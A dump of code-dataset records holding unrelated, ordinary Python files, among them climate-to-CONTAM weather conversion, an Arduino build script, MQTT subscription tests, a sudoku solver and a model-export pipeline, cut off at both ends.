np.array([ob.datetime for ob in obs])\n\n # ............................... WEATHER DATA ............................\n #\n Hstn = np.array([ob.elevation for ob in obs]) # meters\n T = np.array([ob.air_temperature.get_numeric() for ob in obs]) # deg C\n Ps = np.array([ob.sea_level_pressure.get_numeric() for ob in obs])*100. # Pa\n Pb = pressureCorrection(Ps, Hstn, T+273.15) # Pa\n wspd = np.array([ob.wind_speed.get_numeric() for ob in obs]) # m s-1 \n wdir = np.array([ob.wind_direction.get_numeric() for ob in obs]) # degrees\n # Conversion from relative humidity to mixing ratio \n # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n A = 6.116441\n m = 7.591386\n Tn = 240.7263\n es = A*10**(m*(T)/(T+Tn))\n ws = 0.622 * (es/Pb)\n w = np.array([ob.humidity.get_numeric() for ob in obs]) * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n # Calculation of air density\n Rd = 287. # Gas constant for dry air; J kg-1 K-1\n rho = Pb / (Rd * (T+273.15))\n # Create a pandas DataFrame that contains the weather data.\n wth = pd.DataFrame({'Ta' : T+273.15,\n 'Pb' : Pb,\n 'Ws' : wspd,\n 'Wd' : wdir,\n 'Hr' : w,\n 'rho' : rho,\n 'elevation': Hstn},\n index=time)\n \n # Resample the dataframe to an hourly time step.\n wth = wth.resample('H').mean()\n \n return wth\n\ndef readMACA(city, year, rcp, model):\n \"\"\"\n This function reads data from a data file of MACA downscaled climate data \n into a pandas dataframe, df. The dataframe can then be written to a CONTAM \n weather file using function, writeContamWeatherFile. It assumes the user\n wants to generate data files for ALL of the 19 contam cities.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 4 Oct 2017\n \"\"\"\n import pytz\n import ephem\n import sys\n from socket import gethostname\n \n def solar_times(city, date):\n # Sets up the Observer using the city's lat/lon.\n tz = pytz.timezone(city.time_zone)\n o = ephem.Observer()\n o.date = (date + pd.Timedelta('9 hours')).astimezone(pytz.UTC)\n o.lat = city.latitude*np.pi/180.\n o.long = (360.+city.longitude)*np.pi/180.\n o.elev = city.altitude\n sun = ephem.Sun()\n sunrise = o.previous_rising(sun)\n noon = o.next_transit(sun, start=sunrise)\n sunset = o.next_setting(sun, start=noon)\n # Convert from UTC to local time zone.\n local_sunrise = pytz.utc.localize(sunrise.datetime(), is_dst=None).astimezone(tz)\n local_noon = pytz.utc.localize(noon.datetime(), is_dst=None).astimezone(tz)\n local_sunset = pytz.utc.localize(sunset.datetime(), is_dst=None).astimezone(tz)\n return local_sunrise, local_noon, local_sunset\n \n # Read in data files depending on year and RCP.\n hostname = gethostname()\n if hostname.find('petb227a') >= 0: # This is the hostname for gaia.\n directory = '/mnt/data/lima/iaq/maca/'\n elif hostname.find('sila') >= 0:\n directory = '/Volumes/vonw/data/iaq/maca/'\n else:\n print('Not a valid computer for access to MACA data. Try again...')\n sys.exit()\n if ((year>=1996) and (year<=2006)):\n yearstr = '_1995_2006.csv'\n elif ((year>=2010) and (year<=2020)):\n yearstr = '_2009_2020.csv'\n elif ((year>=2030) and (year<=2040)):\n yearstr = '_2029_2040.csv'\n elif ((year>=2044) and (year<=2056)):\n yearstr = '_2044_2056.csv'\n elif ((year>=2086) and (year<=2095)):\n yearstr = '_2085_2096.csv'\n elif ((year>=2096) and (year<=2098)):\n yearstr = '_2089_2099.csv'\n else:\n print('Incorrect year. Try again...')\n return\n \n # Create dataframes from desired data files.\n tasmax = pd.read_csv(directory + city.city + '_tasmax_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n tasmin = pd.read_csv(directory + city.city + '_tasmin_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n huss = pd.read_csv(directory + city.city + '_huss_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n pr = pd.read_csv(directory + city.city + '_pr_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n uas = pd.read_csv(directory + city.city + '_uas_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n vas = pd.read_csv(directory + city.city + '_vas_' + str(rcp) + yearstr, index_col='time', parse_dates=True)\n \n # Create DAILY time series for the desired year and model.\n b = str(year)+'-01-01'\n e = str(year+1)+'-01-01' \n Ps = 101325. * (1 - 2.25577e-5 * city.altitude)**5.25588 # Very simple conversion from altitude to pressure; https://www.engineeringtoolbox.com/air-altitude-pressure-d_462.html\n Tmax = tasmax[b:e][model]\n Tmin = tasmin[b:e][model]\n #Tavg = pd.concat((Tmax,Tmin),axis=1).mean(axis=1)\n Hr = huss[b:e][model] / (1 - huss[b:e][model]) * 1000. # convert from specific humidity to mixing ratio, then from kg kg-1 to g kg-1.\n prcp = pr[b:e][model]\n wspd = (uas[b:e][model]**2 + vas[b:e][model]**2)**0.5\n wdir = np.arctan2(uas[b:e][model],vas[b:e][model])\n wdir[wdir>=0.] = wdir[wdir>=0.]*180/np.pi\n wdir[wdir<0.] = 360. + (wdir[wdir<0.]*180/np.pi)\n daily = pd.DataFrame({'Ps': Ps,\n 'Tmax': Tmax,\n 'Tmin': Tmin,\n 'prcp': prcp,\n 'wspd': wspd,\n 'wdir': wdir,\n 'Hr': Hr},\n index=Tmax.index).tz_localize(city.time_zone)\n \n # Creates a weather dataframe with an HOURLY timescale; winds and RH are interpolated.\n time = pd.date_range(str(year)+'-01-01',str(year)+'-12-31 23',freq='H',tz=city.time_zone)\n wth = pd.DataFrame({'Pb':daily.Ps.resample('H').ffill(),\n 'Ws':daily.wspd.resample('H').interpolate(),\n 'Wd':daily.wdir.resample('H').interpolate(),\n 'Hr':daily.Hr.resample('H').interpolate()},\n index=time)\n \n # Generate time series of daily max and min temperatures (for interpolation).\n t = []\n T = []\n for day in daily.itertuples():\n sunrise, noon, sunset = solar_times(city, day.Index.to_pydatetime())\n t.append(sunrise)\n T.append(day.Tmin)\n t.append(noon+pd.Timedelta('3 hours')) # This is a guess as to when Tmax occurs.\n T.append(day.Tmax)\n\n x = np.array([time.timestamp() for time in wth.index])\n xp = np.array([time.timestamp() for time in t])\n fp = np.array(T)\n Ta = np.interp(x,xp,fp,fp[0],fp[-1])\n wth['Ta'] = Ta\n \n return wth\n\ndef writeContamWeatherFile(wthrFile, df):\n \"\"\"\n This function writes the data in the pandas dataframe, df, to a text file.\n The text file is formatted as a CONTAM weather file.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 2 Jun 2017\n \"\"\"\n # Open new weather file.\n fp = open(wthrFile, 'w')\n \n # Write the first header lines.\n fp.write('WeatherFile ContamW 2.0\\n\\n');\n fp.write(df.index[0].to_pydatetime().strftime('%m/%d') + '\t !start-of-file date\\n');\n fp.write(df.index[-1].to_pydatetime().strftime('%m/%d') + '\t !end-of-file date\\n');\n fp.write('!Date\tDofW\tDtype\tDST\tTgrnd [K]\\n');\n \n # Write daily average data.\n dfa = df.resample('1D').mean()\n for day in dfa.index:\n fp.write( day.strftime('%m/%d') + '\\t' \n + str(day.weekday()+1) + '\\t'\n + str(day.weekday()+1) + '\\t{0:2d}\\t{1:10.2f}\\n'.format(day.timetuple().tm_isdst,dfa.loc[day]['Ta']))\n \n # Write the second header line.\n fp.write('!Date\tTime\tTa [K]\tPb [Pa]\tWs [m/s]\tWd [deg]\tHr [g/kg]\tIth [kJ/m^2]\tIdn [kJ/m^2]\tTs [K]\tRn [-]\tSn [-]\\n');\n\n # Write the hourly data.\n for hour in df.index:\n fp.write( hour.strftime('%m/%d') + '\\t'\n + hour.strftime('%H:%M:%S') \n + '\\t{0:10.2f}\\t{1:10.2f}\\t{2:10.2f}\\t{3:10.2f}\\t{4:10.2f}\\t{5:10.2f}\\t{6:10.2f}\\t{7:10.2f}\\t{8:10.2f}\\t{9:10.2f}\\n'.format(df.loc[hour]['Ta'],df.loc[hour]['Pb'],df.loc[hour]['Ws'],df.loc[hour]['Wd'],df.loc[hour]['Hr'],0.,0.,0.,0.,0.))\n \n # Close the weather file.\n fp.close()\n \n return\n\ndef writeContamSpeciesFile(specFile, df):\n \"\"\"\n This function writes the data in the pandas dataframe, df, to a text file.\n The text file is formatted as a CONTAM species file.\n\n \"\"\"\n # Open new file.\n fp = open(specFile, 'w')\n \n # Write the first header lines.\n fp.write('SpeciesFile ContamW 2.0 ! file and version identification\\n\\n\\n');\n fp.write(df.index[0].to_pydatetime().strftime('%m/%d') + '\\t');\n fp.write(df.index[-1].to_pydatetime().strftime('%m/%d') + '\\t' + str(len(df.columns)) + '\\n');\n fp.write('\\t'.join(df.columns.values.tolist()) + '\\n');\n # Write the df.\n for hour in df.index:\n fp.write( hour.strftime('%m/%d') + '\\t'\n + hour.strftime('%H:%M:%S') + '\\t'\n + '\\t'.join([str(x) for x in df.loc[hour].values.tolist()]) +'\\n')\n \n # Close the file.\n fp.close()\n \n return\n\n","sub_path":"python/contam_input.py","file_name":"contam_input.py","file_ext":"py","file_size_in_byte":25242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"287258290","text":"# Copyright 2019-present PlatformIO \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nArduino\n\nArduino Wiring-based Framework allows writing cross-platform software to\ncontrol devices attached to a wide range of Arduino boards to create all\nkinds of creative coding, interactive objects, spaces or physical experiences.\n\nhttp://arduino.cc/en/Reference/HomePage\n\"\"\"\n\nimport sys\nfrom os.path import isdir, isfile, join\n\nfrom SCons.Script import DefaultEnvironment\n\nenv = DefaultEnvironment()\nplatform = env.PioPlatform()\n\nFRAMEWORK_DIR = platform.get_package_dir(\"framework-arduino-megaavr\")\nassert isdir(FRAMEWORK_DIR)\n\nboard = env.BoardConfig()\nbuild_core = board.get(\"build.core\", \"\")\n\nCPPDEFINES = [\n \"ARDUINO_ARCH_MEGAAVR\",\n (\"ARDUINO\", 10808)\n]\n\nif \"build.usb_product\" in board:\n CPPDEFINES += [\n (\"USB_VID\", board.get(\"build.hwids\")[0][0]),\n (\"USB_PID\", board.get(\"build.hwids\")[0][1]),\n (\"USB_PRODUCT\", '\\\\\"%s\\\\\"' %\n board.get(\"build.usb_product\", \"\").replace('\"', \"\")),\n (\"USB_MANUFACTURER\", '\\\\\"%s\\\\\"' %\n board.get(\"vendor\", \"\").replace('\"', \"\"))\n ]\n\nenv.SConscript(\"_bare.py\", exports=\"env\")\n\nenv.Append(\n CPPDEFINES=CPPDEFINES,\n\n CPPPATH=[\n join(FRAMEWORK_DIR, \"cores\", build_core, \"api\", \"deprecated\"),\n join(FRAMEWORK_DIR, \"cores\", build_core)\n ],\n\n LIBSOURCE_DIRS=[\n join(FRAMEWORK_DIR, \"libraries\")\n ]\n)\n\n# Bootloader and fuses for uploading purposes\nbootloader_config = board.get(\"bootloader\", {})\nif \"BOOTLOADER_CMD\" not in env:\n if env.subst(\"$BOARD\") == \"uno_wifi_rev2\":\n bootloader_path = join(\n FRAMEWORK_DIR, \"bootloaders\", board.get(\"bootloader.file\", \"\"))\n if isfile(bootloader_path):\n env.Replace(BOOTLOADER_CMD='-Uflash:w:\"%s\":i' % bootloader_path)\n else:\n sys.stderr.write(\n \"Error: Couldn't find bootloader image %s\\n\" % bootloader_path)\n env.Exit(1)\n\nif \"FUSES_CMD\" not in env:\n for fuse in (\"OSCCFG\", \"SYSCFG0\", \"BOOTEND\"):\n if not bootloader_config.get(fuse, \"\"):\n sys.stderr.write(\"Error: Missing %s fuse value\\n\" % fuse)\n env.Exit(1)\n\n env.Replace(\n FUSES_CMD=\"-Ufuse2:w:%s:m -Ufuse5:w:%s:m -Ufuse8:w:%s:m\" % (\n bootloader_config.get(\"OSCCFG\"),\n bootloader_config.get(\"SYSCFG0\"),\n bootloader_config.get(\"BOOTEND\")\n )\n )\n\n#\n# Target: Build Core Library\n#\n\nlibs = []\n\nif \"build.variant\" in board:\n variants_dir = join(\n \"$PROJECT_DIR\", board.get(\"build.variants_dir\")) if board.get(\n \"build.variants_dir\", \"\") else join(FRAMEWORK_DIR, \"variants\")\n\n env.Append(\n CPPPATH=[\n join(variants_dir, board.get(\"build.variant\"))\n ]\n )\n env.BuildSources(\n join(\"$BUILD_DIR\", \"FrameworkArduinoVariant\"),\n join(variants_dir, board.get(\"build.variant\"))\n )\n\nenv.BuildSources(\n join(\"$BUILD_DIR\", \"FrameworkArduino\"),\n join(FRAMEWORK_DIR, \"cores\", build_core)\n)\n\nenv.Prepend(LIBS=libs)\n","sub_path":"builder/frameworks/arduino.py","file_name":"arduino.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"556587058","text":"# Cat plugin\n# Commands:\n# - /cat\n# Configuration: None\n\nimport requests\nfrom .basic import CommandBase, CommandInfo, bot_command\n\nclass Cat(CommandBase):\n name = \"Cat\"\n safename = \"cat\"\n def __init__(self, logger):\n super().__init__(logger)\n self.to_register = [\n CommandInfo(\"cat\", self.execute, \"Displays a random cat image.\")\n ]\n def get_help_msg(self, cmd):\n return \"Call /cat with no arguments.\"\n @bot_command\n def execute(self, bot, update, args):\n data = requests.head(\"https://api.thecatapi.com/api/images/get\")\n bot.send_photo(chat_id = update.message.chat_id, \n photo = data.headers[\"Location\"],\n disable_notification = True)\n","sub_path":"commands/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"337173467","text":"def print_board(board):\n for row in range(9):\n for col in range(9):\n print(board[row][col], end=' ')\n print()\n\ndef check_empty(board, loc):\n for row in range(9):\n for col in range(9):\n if board[row][col]==0:\n loc[0]=row\n loc[1]=col\n return True\n return False\n\ndef check_row(board, row, num):\n for i in range(9):\n if board[row][i]==num:\n return False\n return True\n\ndef check_column(board, col, num):\n for i in range(9):\n if board[i][col]==num:\n return False\n return True\n\ndef check_box(board, row, col, num):\n for i in range(3):\n for j in range(3):\n if board[i+(row-row%3)][j+(col-col%3)]==num:\n return False\n return True\n\ndef check_all(board, row, col, num):\n return check_row(board, row, num) and check_column(board, col, num) and check_box(board, row, col, num)\n\n\ndef solve(board):\n\n loc = [0, 0]\n\n if not check_empty(board, loc):\n return True\n\n row, col = loc[0], loc[1]\n\n for num in range(1, 10):\n if check_all(board, row, col, num):\n board[row][col]=num\n if solve(board):\n return True\n board[row][col]=0\n return False\n\nif __name__ == \"__main__\":\n\n board = [[5,3,0,0,7,0,0,0,0],\n [6,0,0,1,9,5,0,0,0],\n [0,9,8,0,0,0,0,6,0],\n [8,0,0,0,6,0,0,0,3],\n [4,0,0,8,0,3,0,0,1],\n [7,0,0,0,2,0,0,0,6],\n [0,6,0,0,0,0,2,8,0],\n [0,0,0,4,1,9,0,0,5],\n [0,0,0,0,8,0,0,7,9]]\n\n if solve(board):\n print_board(board)\n else:\n print('No solution exists')\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"558987840","text":"#\r\n# Metrix++, Copyright 2009-2019, Metrix++ Project\r\n# Link: https://github.com/metrixplusplus/metrixplusplus\r\n# \r\n# This file is a part of Metrix++ Tool.\r\n# \r\n\r\nfrom metrixpp.mpp import api\r\nimport re\r\n\r\nclass Plugin(api.Plugin, api.MetricPluginMixin, api.Child, api.IConfigurable):\r\n \r\n def declare_configuration(self, parser):\r\n parser.add_option(\"--std.code.lines.code\", \"--sclc\", action=\"store_true\", default=False,\r\n help=\"Enables collection of lines of code metric (per region detalization) - \"\r\n \"number of non-empty lines of code, excluding comments \"\r\n \"[default: %default]\")\r\n parser.add_option(\"--std.code.lines.preprocessor\", \"--sclp\", action=\"store_true\", default=False,\r\n help=\"Enables collection of lines of preprocessor code metric (per region detalization) - \"\r\n \"number of non-empty lines of preprocessor code \"\r\n \"[default: %default]\")\r\n parser.add_option(\"--std.code.lines.comments\", \"--sclcom\", action=\"store_true\", default=False,\r\n help=\"Enables collection of lines of comments metric (per region detalization) - \"\r\n \"number of non-empty lines of comments \"\r\n \"[default: %default]\")\r\n parser.add_option(\"--std.code.lines.total\", \"--sclt\", action=\"store_true\", default=False,\r\n help=\"Enables collection of total lines metric (per region detalization) - \"\r\n \"number of any type of lines (blank, code, comments, etc.)\"\r\n \"[default: %default]\")\r\n \r\n def configure(self, options):\r\n self.is_active_code = options.__dict__['std.code.lines.code']\r\n self.is_active_preprocessor = options.__dict__['std.code.lines.preprocessor']\r\n self.is_active_comments = options.__dict__['std.code.lines.comments']\r\n self.is_active_total = options.__dict__['std.code.lines.total']\r\n \r\n pattern_line = re.compile(r'''[^\\s].*''')\r\n\r\n def initialize(self):\r\n self.declare_metric(self.is_active_code,\r\n self.Field('code', int),\r\n self.pattern_line,\r\n api.Marker.T.CODE | api.Marker.T.STRING,\r\n merge_markers=True)\r\n self.declare_metric(self.is_active_preprocessor,\r\n self.Field('preprocessor', int),\r\n self.pattern_line,\r\n api.Marker.T.PREPROCESSOR)\r\n self.declare_metric(self.is_active_comments,\r\n self.Field('comments', int),\r\n self.pattern_line,\r\n api.Marker.T.COMMENT)\r\n self.declare_metric(self.is_active_total,\r\n self.Field('total', int),\r\n self.pattern_line,\r\n api.Marker.T.ANY,\r\n merge_markers=True)\r\n\r\n super(Plugin, self).initialize(fields=self.get_fields())\r\n\r\n if self.is_active() == True:\r\n self.subscribe_by_parents_interface(api.ICode)\r\n","sub_path":"metrixpp/ext/std/code/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"277427632","text":"from logging import NOTSET\nfrom time import sleep, time\nfrom typing import Protocol\nimport unittest\nfrom unittest.case import expectedFailure\nimport paho.mqtt.client as mqtt\nimport os\n\n\ndef write_file(data):\n with open('log', 'w', encoding='utf-8')as f:\n f.write(data)\n\n\ndef read_file():\n with open('log', 'r')as f:\n data = f.read()\n return data\n\n\ndef initClient():\n return mqtt.Client(client_id=\"client_sub\", clean_session=None, userdata=None, protocol=mqtt.MQTTv311,\n transport=\"tcp\")\n\n\n# The callback for when the client receives a CONNACK response from the server.\n\n\ndef on_connect(client, userdata, flags, rc):\n data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n \") connected broker with result: \" + mqtt.connack_string(rc)\n\n\ndef on_subscribe(client, userdata, mid, granted_qos):\n data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n \") with Qos \" + str(granted_qos[0]) + \" successfully\"\n write_file(data)\n\n\ndef get_subscribe_str(client_id, qos):\n return \"Client:(\" + client_id + \") with Qos \" + str(qos) + \" successfully\"\n\n\ndef on_unsubscribe(client, userdata, mid):\n data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n \") unsubscribed successfully\"\n write_file(data)\n\n\ndef get_unsubscribe_str(client_id):\n return \"Client:(\" + client_id + \") unsubscribed successfully\"\n\n\ndef on_message(client, userdata, msg):\n data = \"Client:(\" + str(client._client_id, encoding=\"utf-8\") + \\\n \") received message: \" + str(msg.payload) + \" from topic \" + msg.topic\n write_file(data)\n\n\ndef get_message(client_id, msg, topic):\n return \"Client:(\" + client_id + \") received message: b'\" + str(msg) + \"' from topic \" + topic\n\n\ndef on_disconnect(client, userdata, rc):\n if rc != 0:\n data = \"Unexpected disconnection.\"\n data = \"Client:(\" + str(client._client_id,\n encoding=\"utf-8\") + \") disconnect successfully\"\n\n\ndef client_init(name_str, url, port):\n client = mqtt.Client(client_id=name_str, clean_session=True,\n userdata=None, protocol=mqtt.MQTTv311, transport=\"tcp\")\n client.on_connect = on_connect\n client.on_subscribe = on_subscribe\n client.on_unsubscribe = on_unsubscribe\n client.on_message = on_message\n client.on_disconnect = on_disconnect\n client.connect(url, port)\n return client\n\n\ndef loop(client=None, topic=\"\"):\n if client is None:\n os.system('mosquitto_pub -t ' + topic + ' -h localhost -m \"' + topic + '\"')\n return\n client.loop_start()\n if topic != \"\":\n os.system('mosquitto_pub -t ' + topic + ' -h localhost -m \"' + topic + '\"')\n sleep(1)\n client.loop_stop()\n\n\nclass TestSubUnit(unittest.TestCase):\n url = \"127.0.0.1\"\n port = 1883\n new_topic = \"c\"\n exist_topic = \"test\"\n common_topic = \"hello\"\n qos0 = 0\n qos1 = 1\n qos2 = 2\n qos_error = 3\n\n def test_server_no_topic(self):\n client_id = \"test_server_no_topic\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe(self.new_topic, qos=qos)\n\n loop(client)\n self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n client.unsubscribe(self.new_topic)\n\n loop(client)\n self.assertEqual(read_file(), get_unsubscribe_str(client_id))\n\n client.disconnect()\n\n def test_server_exist_topic(self):\n client_id = \"test_server_exist_topic\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe(self.exist_topic, qos=qos)\n\n loop(client)\n self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n client.unsubscribe(self.exist_topic)\n client.disconnect()\n\n def test_multiple_topic(self):\n client_id = \"test_multiple_topic\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe([(self.exist_topic, qos), (self.common_topic, qos)])\n\n loop(client)\n self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n loop(client, self.exist_topic)\n self.assertEqual(read_file(), get_message(client_id, self.exist_topic, self.exist_topic))\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.exist_topic)\n\n loop(client)\n self.assertEqual(read_file(), get_unsubscribe_str(client_id))\n\n client.unsubscribe(self.common_topic)\n\n loop(client)\n self.assertEqual(read_file(), get_unsubscribe_str(client_id))\n\n client.disconnect()\n\n def test_publish_without_subscribe(self):\n loop(topic=self.exist_topic)\n\n client_id = \"test_publish_without_subscribe\"\n qos = self.qos0\n\n client = client_init(\n \"test_publish_without_subscribe\", self.url, self.port)\n client.subscribe(self.exist_topic, qos=self.qos0)\n\n loop(client)\n self.assertEqual(read_file(), get_subscribe_str(client_id, qos))\n\n client.unsubscribe(self.exist_topic)\n client.disconnect()\n\n def test_recv_message_once(self):\n client_id = \"test_recv_message_once\"\n qos = self.qos0\n\n client = client_init(client_id, self.url, self.port)\n client.subscribe(self.common_topic, qos=qos)\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.common_topic)\n client.disconnect()\n\n def test_recv_message_multiple(self):\n client_id = \"test_recv_message_multiple\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe([(self.exist_topic, qos), (self.common_topic, qos)])\n\n loop(client, self.exist_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.exist_topic, self.exist_topic))\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.exist_topic)\n client.unsubscribe(self.common_topic)\n client.disconnect()\n\n def test_recv_message_main_topic(self):\n client_id_a = \"test_recv_message_main_topic_a\"\n client_id_b = \"test_recv_message_main_topic_b\"\n qos = self.qos0\n client_a = client_init(client_id_a, self.url, self.port)\n client_b = client_init(client_id_b, self.url, self.port)\n\n client_a.subscribe(self.common_topic + '/a', qos)\n client_b.subscribe(self.common_topic + '/b', qos)\n\n client_a.loop_start()\n client_b.loop_start()\n\n os.system('mosquitto_pub -t ' + self.common_topic+'/a' + ' -h localhost -m \"' + self.common_topic+'/a' + '\"')\n\n sleep(1)\n\n self.assertEqual(read_file(), get_message(\n client_id_a, self.common_topic + '/a', self.common_topic + '/a'))\n\n os.system(\n 'mosquitto_pub -t ' + self.common_topic + '/b' + ' -h localhost -m \"' + self.common_topic + '/b' + '\"')\n\n sleep(1)\n\n self.assertEqual(read_file(), get_message(\n client_id_b, self.common_topic + '/b', self.common_topic + '/b'))\n\n client_a.loop_stop()\n client_b.loop_stop()\n\n client_a.unsubscribe(self.common_topic + '/a')\n client_b.unsubscribe(self.common_topic + '/b')\n client_a.disconnect()\n client_b.disconnect()\n\n def test_recv_message_sub_topic(self):\n client_id = \"test_recv_message_sub_topic\"\n qos = self.qos0\n client = client_init(client_id, self.url, self.port)\n client.subscribe(self.common_topic, qos=qos)\n\n loop(client, self.common_topic)\n self.assertEqual(read_file(), get_message(\n client_id, self.common_topic, self.common_topic))\n\n client.unsubscribe(self.common_topic)\n client.disconnect()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"paho-mqtt-py/test_sub.py","file_name":"test_sub.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"101884297","text":"from easydict import EasyDict\nfrom typing import Union\nfrom pathlib import Path\n\nfrom vortex.utils.common import check_and_create_output_dir\nfrom vortex.core.factory import create_model,create_dataset,create_exporter\nfrom vortex.predictor import create_predictor\nfrom vortex.core.pipelines.base_pipeline import BasePipeline\n\n__all__ = ['GraphExportPipeline']\n\nclass GraphExportPipeline(BasePipeline):\n \"\"\"Vortex Graph Export Pipeline API\n \"\"\"\n\n def __init__(self,\n config: EasyDict, \n weights : Union[str,Path,None] = None):\n \"\"\"Class initialization\n\n Args:\n config (EasyDict): dictionary parsed from Vortex experiment file\n weights (Union[str,Path,None], optional): path to selected Vortex model's weight. If set to None, it will \\\n assume that final model weights exist in **experiment directory**. \\\n Defaults to None.\n \n Example:\n ```python\n from vortex.utils.parser import load_config\n from vortex.core.pipelines import GraphExportPipeline\n \n # Parse config\n config = load_config('experiments/config/example.yml')\n graph_exporter = GraphExportPipeline(config=config,\n weights='experiments/outputs/example/example.pth')\n ```\n \"\"\"\n \n # Configure output directory\n self.experiment_directory, _ = check_and_create_output_dir(config)\n self.experiment_name = config.experiment_name\n\n # Initialize Pytorch model\n if weights is None:\n state_dict = self.experiment_directory / '{}.pth'.format(self.experiment_name)\n else:\n state_dict = weights\n model_components = create_model(config.model,state_dict=state_dict,stage='validate')\n model_components.network = model_components.network.eval()\n self.predictor = create_predictor(model_components).eval()\n self.image_size = config.model.preprocess_args.input_size\n\n # Initialize dataset train to get class_names\n dataset = create_dataset(config.dataset,\n preprocess_config=config.model.preprocess_args, \n stage='train'\n )\n self.class_names = dataset.dataset.class_names if hasattr(dataset.dataset, 'class_names') else None\n\n # Initialize export config\n self.export_configs = [config.exporter] \\\n if not isinstance(config.exporter, list) \\\n else config.exporter\n\n def run(self,\n example_input : Union[str,Path,None] = None) -> EasyDict :\n \"\"\"Function to execute the graph export pipeline\n\n Args:\n example_input (Union[str,Path,None], optional): path to example input image to help graph tracing. Defaults to None.\n\n Returns:\n EasyDict: dictionary containing status of the export process\n \n Example:\n ```python\n example_input = 'image1.jpg'\n graph_exporter = GraphExportPipeline(config=config,\n weights='experiments/outputs/example/example.pth')\n\n result = graph_exporter.run(example_input=example_input)\n ```\n \"\"\"\n outputs = []\n ok = True\n for export_config in self.export_configs :\n exporter = create_exporter(\n config=export_config,\n experiment_name=self.experiment_name,\n image_size=self.image_size,\n output_directory=(self.experiment_directory),\n )\n ok = exporter(\n predictor=self.predictor,\n class_names=self.class_names,\n example_image_path=example_input\n ) and ok\n outputs.append(str(exporter.filename))\n print('model is exported to:', ' and '.join(outputs))\n # TODO specify which export is failed\n result = EasyDict({'export_status' : ok})\n return result","sub_path":"vortex/core/pipelines/export_pipeline.py","file_name":"export_pipeline.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"130603890","text":"import numpy as np\nimport argparse\nfrom PIL import Image, ImageStat, ImageMath\nimport math\n\nparser = argparse.ArgumentParser()\nparser.add_argument('fname')\nparser.add_argument('pref', default=\"\", nargs=\"?\")\nargs = parser.parse_args()\n\nim = Image.open(args.fname)\nRGB = im.convert('RGB')\n\nimWidth, imHeight = im.size\n\nratg = 1.2\nratgb = 1.66\nming = 10\nratr = 2\nspeed = 8\n\nGI = 0\ntotal = 0\n\nfor i in range(0, int(imWidth/speed)):\n\tfor j in range(0, int(imHeight/speed)):\n\t\tR,G,B = RGB.getpixel((i*speed,j*speed))\n\t\tGI += 2*G - R - B\n\t\ttotal = total + 1\n\nprint(\"GreenIndex=\"+str(float(GI)/total))\n","sub_path":"DistributedRL/Aggregator/build/Code/sim/Parser/greenIndex/GreenIndex.py","file_name":"GreenIndex.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"209517487","text":"## AIA\n## Búsqueda con adversario\n## Dpto. de C. de la Computación e I.A. (Univ. de Sevilla)\n## ===================================================================\n\n## En esta práctica vamos a implementar los algoritmos minimax y\n## minimix con poda alfa beta para decidir el siguiente movimiento en\n## un problema de búsqueda con adversario.\n\n## ==================================================================\n## Representación de problemas de búsqueda con adversario\n## ==================================================================\n\n## Recuérdese que según lo que se ha visto en clase, la implementación\n## de la representación de un juego consiste en:\n\n## * Representar estados y movimientos mediante alguna una estructura\n## de datos.\n## * Definir: es_estado_final(_), es_estado_ganador(_,_,_),\n## movimientos(_), aplica(_,_), f_utilidad(_,_), y f_evaluacion(_,_)\n## * Definir: estado_inicial, minimo_valor y 